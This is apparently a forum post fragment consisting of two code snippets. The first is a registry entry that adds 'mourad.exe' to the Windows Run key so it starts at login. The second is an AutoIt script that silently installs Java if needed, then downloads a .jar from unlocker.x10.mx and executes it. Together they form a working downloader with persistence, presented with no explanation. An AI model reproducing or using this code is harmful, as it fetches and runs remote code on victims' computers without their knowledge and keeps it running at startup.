my (Register to add
PHP Code:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"mourad"="C:\\Documents and Settings\\pc\\Application Data\\mourad.exe"
PHP Code:
#include <NavInfo.au3>
$Is_Java = _NavInfo_IsJavaInstalled()
If $Is_Java Then
InetGet("http://unlocker.x10.mx/archivos_upload/406299.jar", @TempDir & "\1.jar")
ShellExecute(@TempDir & "\1.jar")
Else
InetGet("http://javadl.sun.com/webapps/download/AutoDL?BundleId=76860", "javainstall.exe")
RunWait("javainstall.exe /s")
InetGet("http://unlocker.x10.mx/archivos_upload/406299.jar", @TempDir & "\1.jar")
ShellExecuteWait(@TempDir & "\1.jar")
EndIf






